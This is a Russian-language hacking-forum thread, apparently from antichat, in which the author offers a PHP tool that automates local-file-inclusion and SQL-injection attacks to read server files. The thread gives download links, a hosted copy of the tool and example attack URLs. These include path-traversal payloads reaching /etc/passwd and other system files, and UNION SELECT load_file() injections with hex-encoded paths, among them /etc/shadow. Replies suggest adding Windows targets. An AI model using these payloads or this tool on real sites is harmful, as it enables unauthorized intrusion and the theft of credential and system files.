Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции.
В файл dirs.txt записываем диры, которые надо проверить.

Download:
- [0x57656246696C652E7275] (http://webfile.ru/1549146)
- [0xSLIL.0xRU] (http://slil.ru/24944983)

Скрипт может не работать если:
- Не выводится ошибка
- Вы неверно ввели урл

Сокеты не нужны.

Подходящий хостинг - ueuo.com

Примеры:
1. PHP-Inj:
- Пишем url: http://site.ru/include.php?file=[php]
- Результат http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd
http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts
http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers
http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf
http://site.ru/include.php?file=../../../../../../../../../../../../etc/services
http://site.ru/include.php?file=../../../../../../../../../../../../etc/group
http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc
http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile
http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc
2. SQL-Inj:
- Пишем url: http://site.ru/users.php?id=[sql]
- Колумнов: 12
- Ставим запрос на: 7
- Результат http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 06173737764),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36861646f77),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 86f737473),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 365727669636573),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 7726f7570),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 e6574776f726b73),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 0726f66696c65),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36b656c2f2e626173687263),8,9,10,11,12

Смотрите также
- Mail.Ru BruteForce (http://forum.antichat.ru/thread49574.html)
- Rambler.Ru (http://forum.antichat.ru/thread49610.html)

Обновил скрипт, теперь вместо [url] надо писать [php], так легче, имхо.
Исправил ошибку, когда выдавались неверные данные ну и ещё одну небольшую ошибку.
Если кому лень качать, искать хост и т.д., я залил - http://x0.6te.net/injection.php

удобный скриптик.. не нужно самому подставлять..

номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...

']номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...
Таких тулз - 0 не считая мою, тем более на PHP. И чем тебе не нравится список логов?

неплохо было бы дефолтные виндовые пути вписать ;)

1, норм прога...вот Кеш неплохую идею подогнал!

Светлый, о каких путях на винде ты говоришь??? $systemdir ??

C:\boot.ini

Таких тулз - 0 не считая мою
Уверен?
http://forum.antichat.ru/thread45289.html

Таких тулз - 0 не считая мою, тем более на Php. И чем тебе не нравится список логов?
Таких тулз у меня компе минимум 6 причем есть те которые работают гараздо лучше.

Кэш, ты нервный или мне кажется?О_о

']Таких тулз у меня компе минимум 6 причем есть те которые работают гараздо лучше.
Ок, не нравится, не ешь, у тебя наверно один приват.
Уверен?
http://forum.antichat.ru/thread45289.html
Я уже давно эту прогу смотрел, она не пашет и не атоматическая, много кнопок всяких :)

Обновил скрипт, обновил логи. Если кто-то хочет помочь, пишите ещё пути сюда, добавлю.

P.S. Скрипт теперь ищет дольше, но больше.
P.P.S. Не могу зайти на x0.6te.net, поэтому не могу обновить.